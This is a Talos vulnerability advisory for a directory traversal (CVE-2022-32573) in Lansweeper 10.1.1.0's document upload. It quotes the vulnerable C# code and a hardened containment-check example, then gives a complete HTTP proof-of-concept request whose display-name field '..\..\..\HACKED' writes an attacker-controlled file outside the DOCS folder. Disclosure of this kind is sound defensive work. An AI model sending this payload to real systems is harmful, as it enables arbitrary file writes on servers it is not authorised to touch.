Talos Vulnerability Report

TALOS-2022-1528

Lansweeper lansweeper AssetActions.aspx directory traversal vulnerability

December 1, 2022

CVE Number

CVE-2022-32573

SUMMARY

A directory traversal vulnerability exists in the AssetActions.aspx addDoc functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary file upload. An attacker can send an HTTP request to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Lansweeper lansweeper 10.1.1.0

PRODUCT URLS

lansweeper - https://www.lansweeper.com/

CVSSv3 SCORE

9.9 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)

DETAILS

Lansweeper is an IT Asset Management solution that gathers hardware and software information of computers and other devices on a computer network for management, compliance and audit purposes.

The exploitable directory traversal is reachable through the action Assets -> choose any asset -> Docs -> Add document, and the vulnerable code is located in the \LS\WS\AssetActions.cs file. Let us take a close look at the vulnerable source code:

Line 1 	else if (page.IsPostBack && current.Request["action"] == "addDoc")
Line 2 	{
Line 3 
Line 4 		if (fileup.PostedFile != null && fileup.PostedFile.ContentLength > 0)
Line 5 		{
Line 6 			string text5 = Path.GetFileName(fileup.PostedFile.FileName);
Line 7 			string text6 = Guid.NewGuid().ToString();
Line 8 			int value6 = int.Parse(current.Request["assetId"]);
Line 9 			string item = DateTime.Now.ToString(User.Current().DateTimeFormat);
Line 10			WebUser webUser2 = (WebUser)current.Session["Webuser"];
Line 11			string text7 = ((!webUser2.IsAuthenticated) ? webUser2.Displayname : (webUser2.UserDomain + "\\" + webUser2.UserName));
Line 12			string[] allowedExtensions = General.AllowedExtensions;
Line 13			string text8 = Path.GetExtension(fileup.FileName).ToLower();
Line 14			if (txtdocname.Text != "")
Line 15			{
Line 16				text5 = txtdocname.Text + text8;
Line 17			}
Line 18			bool flag = false;
Line 19			string[] array = allowedExtensions;
Line 20			for (int i = 0; i < array.Length; i++)
Line 21			{
Line 22				if (array[i] == text8)
Line 23				{
Line 24					flag = true;
Line 25				}
Line 26			}
Line 27			string text9 = HttpContext.Current.Server.MapPath("~") + "\\DOCS\\";
Line 28			string filename = text9 + text6 + "_" + text5;
Line 29			if (!Directory.Exists(text9))
Line 30			{
Line 31				Directory.CreateDirectory(text9);
Line 32			}
Line 33			try
Line 34			{
Line 35				if (!flag)
Line 36				{
Line 37					text4 = text4 + "file extension ('" + text8 + "') is not allowed.";
Line 38					throw new CustomException(text4);
Line 39				}
Line 40				fileup.PostedFile.SaveAs(filename);

When uploading a file (document), an attacker can use the txtdocname variable (Display name in the web GUI) to provide an alternative filename, which is not sanitized against directory traversal at all. Path.GetFileName on line 6 is applied only to the client-supplied file name, and line 16 overwrites that value whenever txtdocname is non-empty. The name is then simply concatenated with the path to the DOCS directory (lines 27-28). Because txtdocname is not properly sanitized, an attacker can upload a file to an arbitrary destination within the file system.
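A containment check that rejects a txtdocname value such as the one in the proof of concept, shown as an added example (it is not Lansweeper's code or its patch). DocPath.Resolve, the sample root and the sample document name are hypothetical, and Windows path semantics are assumed.

```csharp
using System;
using System.IO;

static class DocPath
{
    // Hypothetical helper (not Lansweeper code): build the on-disk path for an
    // uploaded document and refuse anything that resolves outside docsRoot.
    public static string Resolve(string docsRoot, string guid, string displayName, string extension)
    {
        if (string.IsNullOrWhiteSpace(displayName))
            throw new ArgumentException("empty document name");

        // Reject (do not strip) separators, drive/stream colons and any other
        // character that is invalid in a file name on this platform.
        if (displayName.IndexOfAny(new[] { '\\', '/', ':' }) >= 0 ||
            displayName.IndexOfAny(Path.GetInvalidFileNameChars()) >= 0)
            throw new ArgumentException("document name contains path characters");

        // Canonicalize and verify containment; the trailing separator stops a
        // sibling such as "DOCS_old" from passing the prefix test.
        string root = Path.GetFullPath(docsRoot);
        if (!root.EndsWith(Path.DirectorySeparatorChar.ToString(), StringComparison.Ordinal))
            root += Path.DirectorySeparatorChar;

        string candidate = Path.GetFullPath(Path.Combine(root, guid + "_" + displayName + extension));
        if (!candidate.StartsWith(root, StringComparison.OrdinalIgnoreCase))
            throw new UnauthorizedAccessException("path escapes the DOCS directory");
        return candidate;
    }

    static void Main()
    {
        string root = @"C:\inetpub\wwwroot\DOCS\";   // constructed sample root
        string guid = Guid.NewGuid().ToString();

        // Lines 27-28 of the listing: plain concatenation, then what it resolves to.
        string vulnerable = root + guid + "_" + @"..\..\..\HACKED" + ".ini";
        Console.WriteLine("concatenated: " + Path.GetFullPath(vulnerable));

        Console.WriteLine("accepted:     " + Resolve(root, guid, "network-diagram", ".ini"));
        try { Resolve(root, guid, @"..\..\..\HACKED", ".ini"); }
        catch (ArgumentException e) { Console.WriteLine("rejected:     " + e.Message); }
    }
}
```

The character check and the canonical-prefix check are deliberately redundant: the first gives a clear validation error, the second still holds if the name reaches the file system through a code path that skipped validation.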

Exploit Proof of Concept

REQUEST

POST /AssetActions.aspx?action=addDoc&assetId=10 HTTP/1.1
Host: 192.168.0.102:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------23614898975253108242957970650
Content-Length: 644
Origin: http://192.168.0.102:81
Connection: close
Referer: http://192.168.0.102:81/AssetActions.aspx?action=addDoc&assetId=10
Cookie: UserSettings=language=1; ASP.NET_SessionId=etcnsycpe3rytjmue2efl5co; custauth=username=hacker&userdomain=; __RequestVerificationToken_Lw__=zP2evPOU4gLNF/pF3R1XPsIP7ceImHsHKoqy7GfYwDnIwHnDJKt3r5+0bFTXNS/XpEAiyEFBVT2ekfSLIPgVMULtvi8Ae4qLSYcUO0UH90vcERUKMi72E3I2yEJexWSyNKlA8gcXlfMPYbc0a94Dji44b2cNn4aS0KGOSUQBn/0=
Upgrade-Insecure-Requests: 1

-----------------------------23614898975253108242957970650
Content-Disposition: form-data; name="__VIEWSTATE"


-----------------------------23614898975253108242957970650
Content-Disposition: form-data; name="fileup"; filename="doc_name_ppt.magicext.ini"
Content-Type: application/vnd.ms-powerpoint

ATTACKER CONTROLED CONTENT
-----------------------------23614898975253108242957970650
Content-Disposition: form-data; name="txtdocname"

..\..\..\HACKED
-----------------------------23614898975253108242957970650
Content-Disposition: form-data; name="btnOK"

Upload
-----------------------------23614898975253108242957970650--

RESPONSE

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
x-frame-options: SAMEORIGIN
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 06 Jun 2022 14:53:18 GMT
Connection: close
Content-Length: 159

<script>window.parent.closeIframe(["10","..\\..\\..\\HACKED.ini","6405c669-95ed-4469-bb1a-ae4665868d1a","..\\Unauthenticated","06/06/2022 16:53:18"]);</script>

TIMELINE

2022-06-27 - Vendor Disclosure
2022-11-29 - Vendor Patch Release
2022-12-01 - Public Release

Credit

Discovered by Marcin 'Icewall' Noga of Cisco Talos.